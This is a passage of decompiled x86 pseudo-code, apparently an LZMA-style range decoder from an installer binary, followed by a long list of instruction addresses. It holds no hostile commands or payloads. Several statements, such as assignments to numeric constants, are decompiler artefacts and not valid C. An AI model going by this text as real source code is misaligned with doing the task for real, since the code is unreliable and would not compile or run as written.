                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      									__cx = __ax;
                                                                                      									_t170 = __edx + 1; // 0x1
                                                                                      									__ebx = _t170;
                                                                                      									__cx = __ax >> 5;
                                                                                      									__eflags = __eax;
                                                                                      									 *__esi = __ax;
                                                                                      								} else {
                                                                                      									 *(__ebp - 0x10) = __ecx;
                                                                                      									0x800 = 0x800 - __edi;
                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      									__ebx = __ebx + __ebx;
                                                                                      									 *__esi = __cx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L46;
                                                                                      								}
                                                                                      							}
                                                                                      							L54:
                                                                                      							_t173 = __ebp - 0x34;
                                                                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      							__eflags =  *_t173;
                                                                                      							goto L55;
                                                                                      						case 0xf:
                                                                                      							L58:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xf;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t203 = __ebp - 0x70;
                                                                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t203;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L60:
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								L55:
                                                                                      								__al =  *(__ebp - 0x44);
                                                                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							L61:
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_t217 = __edx + 1; // 0x1
                                                                                      								__ebx = _t217;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L60;
                                                                                      							} else {
                                                                                      								goto L58;
                                                                                      							}
                                                                                      						case 0x10:
                                                                                      							L109:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t365 = __ebp - 0x70;
                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t365;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							goto L111;
                                                                                      						case 0x11:
                                                                                      							goto L69;
                                                                                      						case 0x12:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							__eflags = __eax;
                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      							goto L130;
                                                                                      						case 0x13:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								_t469 = __ebp - 0x58;
                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      								__eflags =  *_t469;
                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                      								L144:
                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                      								goto L145;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      							L130:
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                      							goto L144;
                                                                                      						case 0x14:
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                      							goto L140;
                                                                                      						case 0x15:
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      							__al = __al & 0x000000fd;
                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      							goto L120;
                                                                                      						case 0x16:
                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                      							__eflags = __eax - 4;
                                                                                      							if(__eax >= 4) {
                                                                                      								_push(3);
                                                                                      								_pop(__eax);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                      							__eax = __eax << 7;
                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							goto L145;
                                                                                      						case 0x17:
                                                                                      							L145:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      							goto L149;
                                                                                      						case 0x18:
                                                                                      							L146:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t484 = __ebp - 0x70;
                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t484;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L148:
                                                                                      							_t487 = __ebp - 0x48;
                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      							__eflags =  *_t487;
                                                                                      							L149:
                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                      								0 = 1;
                                                                                      								__eax = 1 << __cl;
                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								goto L140;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__esi = __edx + __eax;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__ax =  *__esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eax = __eax - __ecx;
                                                                                      								__edx = __edx + 1;
                                                                                      								__eflags = __edx;
                                                                                      								 *__esi = __ax;
                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L148;
                                                                                      							} else {
                                                                                      								goto L146;
                                                                                      							}
                                                                                      						case 0x19:
                                                                                      							__eflags = __ebx - 4;
                                                                                      							if(__ebx < 4) {
                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                      								L119:
                                                                                      								_t393 = __ebp - 0x2c;
                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      								__eflags =  *_t393;
                                                                                      								L120:
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax;
                                                                                      								if(__eax == 0) {
                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                      									goto L171;
                                                                                      								}
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                      								_t400 = __ebp - 0x60;
                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      								__eflags =  *_t400;
                                                                                      								goto L123;
                                                                                      							}
                                                                                      							__ecx = __ebx;
                                                                                      							__eax = __ebx;
                                                                                      							__ecx = __ebx >> 1;
                                                                                      							__eax = __ebx & 0x00000001;
                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                      							__al = __al | 0x00000002;
                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                      							__eflags = __ebx - 0xe;
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							if(__ebx >= 0xe) {
                                                                                      								__ebx = 0;
                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                      								L102:
                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                      									__eax = __eax + __ebx;
                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                      									__eax =  *(__ebp - 4);
                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                      									__eflags = __eax;
                                                                                      									L108:
                                                                                      									__ebx = 0;
                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                      									L112:
                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      										_t391 = __ebp - 0x2c;
                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      										__eflags =  *_t391;
                                                                                      										goto L119;
                                                                                      									}
                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                      									__esi = __edi + __eax;
                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                      									__ax =  *__esi;
                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                      										__ecx = 0;
                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      										__ecx = 1;
                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      										__ebx = 1;
                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                      										__ebx = 1 << __cl;
                                                                                      										__ecx = 1 << __cl;
                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      										__cx = __ax;
                                                                                      										__cx = __ax >> 5;
                                                                                      										__eax = __eax - __ecx;
                                                                                      										__edi = __edi + 1;
                                                                                      										__eflags = __edi;
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										 *__esi = __ax;
                                                                                      										 *(__ebp - 0x50) = __edi;
                                                                                      									} else {
                                                                                      										 *(__ebp - 0x10) = __edx;
                                                                                      										0x800 = 0x800 - __ecx;
                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      										 *__esi = __dx;
                                                                                      									}
                                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      										L111:
                                                                                      										_t368 = __ebp - 0x48;
                                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      										__eflags =  *_t368;
                                                                                      										goto L112;
                                                                                      									} else {
                                                                                      										goto L109;
                                                                                      									}
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0xc);
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      									__ecx =  *(__ebp - 0x10);
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                      									__eflags = __ebx;
                                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									L101:
                                                                                      									_t338 = __ebp - 0x48;
                                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      									__eflags =  *_t338;
                                                                                      									goto L102;
                                                                                      								} else {
                                                                                      									goto L99;
                                                                                      								}
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 4);
                                                                                      							__eax = __eax - __ebx;
                                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      							goto L108;
                                                                                      						case 0x1a:
                                                                                      							L56:
                                                                                      							__eflags =  *(__ebp - 0x64);
                                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x1a;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x68);
                                                                                      							__al =  *(__ebp - 0x5c);
                                                                                      							__edx =  *(__ebp - 8);
                                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      							 *( *(__ebp - 0x68)) = __al;
                                                                                      							__ecx =  *(__ebp - 0x14);
                                                                                      							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      							__eax = __ecx + 1;
                                                                                      							__edx = 0;
                                                                                      							_t192 = __eax %  *(__ebp - 0x74);
                                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                                      							__edx = _t192;
                                                                                      							goto L79;
                                                                                      						case 0x1b:
                                                                                      							goto L75;
                                                                                      						case 0x1c:
                                                                                      							while(1) {
                                                                                      								L123:
                                                                                      								__eflags =  *(__ebp - 0x64);
                                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__edx =  *(__ebp - 8);
                                                                                      								__cl =  *(__eax + __edx);
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                                      								 *(__eax + __edx) = __cl;
                                                                                      								__eax = __eax + 1;
                                                                                      								__edx = 0;
                                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                                      								__edx = _t414;
                                                                                      								__eax =  *(__ebp - 0x68);
                                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      								__eflags =  *(__ebp - 0x30);
                                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                                      								 *(__ebp - 0x14) = _t414;
                                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L80;
                                                                                      								}
                                                                                      							}
                                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                                      							goto L170;
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x004070ab
                                                                                      0x004070ab
                                                                                      0x004070af
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407175
                                                                                      0x00407056
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00407441
                                                                                      0x00407441
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x0040741c
                                                                                      0x00407420
                                                                                      0x004075cf
                                                                                      0x00000000
                                                                                      0x004075cf
                                                                                      0x0040742c
                                                                                      0x00407433
                                                                                      0x0040743b
                                                                                      0x0040743e
                                                                                      0x00000000
                                                                                      0x0040743e
                                                                                      0x004070b5
                                                                                      0x004070b9
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00407601
                                                                                      0x004070bf
                                                                                      0x004070c5
                                                                                      0x004070c8
                                                                                      0x004070cc
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x004075e5
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x00000000
                                                                                      0x004075f6
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406bec
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x00000000
                                                                                      0x00406bfd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c06
                                                                                      0x00406c09
                                                                                      0x00406c0c
                                                                                      0x00406c10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c16
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c1c
                                                                                      0x00406c1f
                                                                                      0x00406c21
                                                                                      0x00406c22
                                                                                      0x00406c24
                                                                                      0x00406c27
                                                                                      0x00406c2c
                                                                                      0x00406c31
                                                                                      0x00406c3a
                                                                                      0x00406c4d
                                                                                      0x00406c50
                                                                                      0x00406c5c
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c94
                                                                                      0x00406c94
                                                                                      0x00406c98
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c88
                                                                                      0x00406c8b
                                                                                      0x00406c8c
                                                                                      0x00406c8c
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c67
                                                                                      0x00406c70
                                                                                      0x00406c78
                                                                                      0x00406c7b
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406ca2
                                                                                      0x0040754e
                                                                                      0x00000000
                                                                                      0x0040754e
                                                                                      0x00406cab
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406cc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cca
                                                                                      0x00406cd0
                                                                                      0x00406cfa
                                                                                      0x00406d00
                                                                                      0x00406d07
                                                                                      0x00000000
                                                                                      0x00406d07
                                                                                      0x00406cd6
                                                                                      0x00406cd9
                                                                                      0x00406cde
                                                                                      0x00406cde
                                                                                      0x00406ce9
                                                                                      0x00406cf1
                                                                                      0x00406cf4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d39
                                                                                      0x00406d3f
                                                                                      0x00406d42
                                                                                      0x00406d4f
                                                                                      0x00406d57
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d0e
                                                                                      0x00406d0e
                                                                                      0x00406d12
                                                                                      0x0040755d
                                                                                      0x00000000
                                                                                      0x0040755d
                                                                                      0x00406d1e
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d2f
                                                                                      0x00406d32
                                                                                      0x00406d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d5f
                                                                                      0x00406d61
                                                                                      0x00406d64
                                                                                      0x00406dd5
                                                                                      0x00406dd8
                                                                                      0x00406ddb
                                                                                      0x00406de2
                                                                                      0x00406dec
                                                                                      0x00000000
                                                                                      0x00406dec
                                                                                      0x00406d66
                                                                                      0x00406d6a
                                                                                      0x00406d6d
                                                                                      0x00406d6f
                                                                                      0x00406d72
                                                                                      0x00406d75
                                                                                      0x00406d77
                                                                                      0x00406d7a
                                                                                      0x00406d7c
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d87
                                                                                      0x00406d8b
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406d9c
                                                                                      0x00406da0
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406dac
                                                                                      0x00406daf
                                                                                      0x00406dcd
                                                                                      0x00406dcf
                                                                                      0x00000000
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db4
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbf
                                                                                      0x00406dc2
                                                                                      0x00406dc4
                                                                                      0x00406dc5
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406ffe
                                                                                      0x00407002
                                                                                      0x00407020
                                                                                      0x00407023
                                                                                      0x0040702a
                                                                                      0x0040702d
                                                                                      0x00407030
                                                                                      0x00407033
                                                                                      0x00407036
                                                                                      0x00407039
                                                                                      0x0040703b
                                                                                      0x00407042
                                                                                      0x00407043
                                                                                      0x00407045
                                                                                      0x00407048
                                                                                      0x0040704b
                                                                                      0x0040704e
                                                                                      0x0040704e
                                                                                      0x00407053
                                                                                      0x00000000
                                                                                      0x00407053
                                                                                      0x00407004
                                                                                      0x00407007
                                                                                      0x0040700a
                                                                                      0x00407014
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407068
                                                                                      0x0040706c
                                                                                      0x0040708f
                                                                                      0x00407092
                                                                                      0x00407095
                                                                                      0x0040709f
                                                                                      0x0040706e
                                                                                      0x0040706e
                                                                                      0x00407071
                                                                                      0x00407074
                                                                                      0x00407077
                                                                                      0x00407084
                                                                                      0x00407087
                                                                                      0x00407087
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040711c
                                                                                      0x00407120
                                                                                      0x00407127
                                                                                      0x0040712a
                                                                                      0x0040712d
                                                                                      0x00407137
                                                                                      0x00000000
                                                                                      0x00407137
                                                                                      0x00407122
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407143
                                                                                      0x00407147
                                                                                      0x0040714e
                                                                                      0x00407151
                                                                                      0x00407154
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715d
                                                                                      0x0040715d
                                                                                      0x00407160
                                                                                      0x00407163
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407203
                                                                                      0x00407203
                                                                                      0x00407207
                                                                                      0x004075a5
                                                                                      0x00000000
                                                                                      0x004075a5
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407220
                                                                                      0x00407222
